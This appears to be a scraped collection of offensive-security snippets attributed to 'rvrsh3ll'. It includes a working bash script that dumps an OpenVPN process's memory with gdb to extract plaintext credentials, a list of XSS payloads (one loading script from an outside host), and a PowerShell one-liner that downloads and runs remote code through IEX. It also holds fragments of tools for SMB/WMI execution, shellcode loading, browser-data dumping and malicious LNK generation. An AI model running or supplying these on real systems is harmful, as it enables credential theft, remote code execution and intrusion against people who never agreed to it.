rvrsh3ll

function Invoke-SMBWmi {

    [CmdletBinding()]
    param(
        [String[]]
        $ComputerName = ".",

        [String]
        $Pipename = "tf12lol"

rvrsh3ll

#!/bin/bash
# This little hack-job will grab credentials from a running openvpn process in Linux
# Keep in mind this won't work if the user used the --auth-nocache flag
pid=$(ps -efww | grep -v grep | grep openvpn | awk '{print $2}')
echo $pid | grep rw-p /proc/$pid/maps | sed -n 's/^\([0-9a-f]*\)-\([0-9a-f]*\) .*$/\1 \2/p' | while read start stop; do gdb --batch-silent --silent --pid $pid -ex "dump memory $pid-$start-$stop.dump 0x$start 0x$stop"; done
echo "Your credentials should be listed below as username/password"

strings *.dump | awk 'NR>=3 && NR<=4 { print }'
rm *.dump --force

rvrsh3ll

';alert(String.fromCharCode(88,83,83))//';alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//--></SCRIPT>">'><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT>
'';!--"<XSS>=&{()}
0\"autofocus/onfocus=alert(1)--><video/poster/onerror=prompt(2)>"-confirm(3)-"
<script/src=data:,alert()>
<marquee/onstart=alert()>
<video/poster/onerror=alert()>
<isindex/autofocus/onfocus=alert()>
<SCRIPT SRC=http://ha.ckers.org/xss.js></SCRIPT>
<IMG SRC="javascript:alert('XSS');">
<IMG SRC=javascript:alert('XSS')>

rvrsh3ll

powershell.exe -nop -c "`$wc = New-Object System.Net.Webclient; `$wc.Headers.Add('User-Agent','Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; AS; rv:11.0) Like Gecko'); `$wc.proxy= [System.Net.WebRequest]::DefaultWebProxy; `$wc.proxy.credentials = [System.Net.CredentialCache]::DefaultNetworkCredentials; IEX (`$wc.downloadstring('$URL'))"

rvrsh3ll

function Get-RecentDocs {

<#
    .SYNOPSIS
        Pulls names of recently opened documents from registry
        Author: Matthew Graeber (@mattifestation)
        License: BSD 3-Clause
        Required Dependencies: None
        Optional Dependencies: None
    .DESCRIPTION

rvrsh3ll

function Get-BrowserInformation {
<#
    .SYNOPSIS
        Dumps Browser Information
        Author: @424f424f
        License: BSD 3-Clause
        Required Dependencies: None
        Optional Dependencies: None
    .DESCRIPTION
        Enumerates browser history or bookmarks

rvrsh3ll

import binascii
import sys

file_name = sys.argv[1]
with open (file_name) as f:
	hexdata = binascii.hexlify(f.read())
	hexlist = map(''.join, zip(hexdata[::2], hexdata[1::2]))
	shellcode = ''
	for i in hexlist:
		shellcode += "0x{},".format(i)

rvrsh3ll

function Invoke-SMBShellcodeLoad {
    <#
    .SYNOPSIS
    Short description
    
    .DESCRIPTION
    Long description
    
    .EXAMPLE
    An example

rvrsh3ll

#!/usr/bin/env python
#
# Title: lookupadmins.py
# Author: @ropnop
# Description: Python script using Impacket to query members of the builtin Administrators group through SAMR
# Similar in function to Get-NetLocalGroup from Powerview
# Won't work against Windows 10 Anniversary Edition unless you already have local admin
# See: http://www.securityweek.com/microsoft-experts-launch-anti-recon-tool-windows-10-server-2016
#
# Heavily based on original Impacket example scripts written by @agsolino and available here: https://github.com/CoreSecurity/impacket

rvrsh3ll

function Create-LNKPayload{
<#
    .SYNOPSIS

        Generates a malicous LNK file

    .PARAMETER LNKName

        Name of the LNK file you want to create.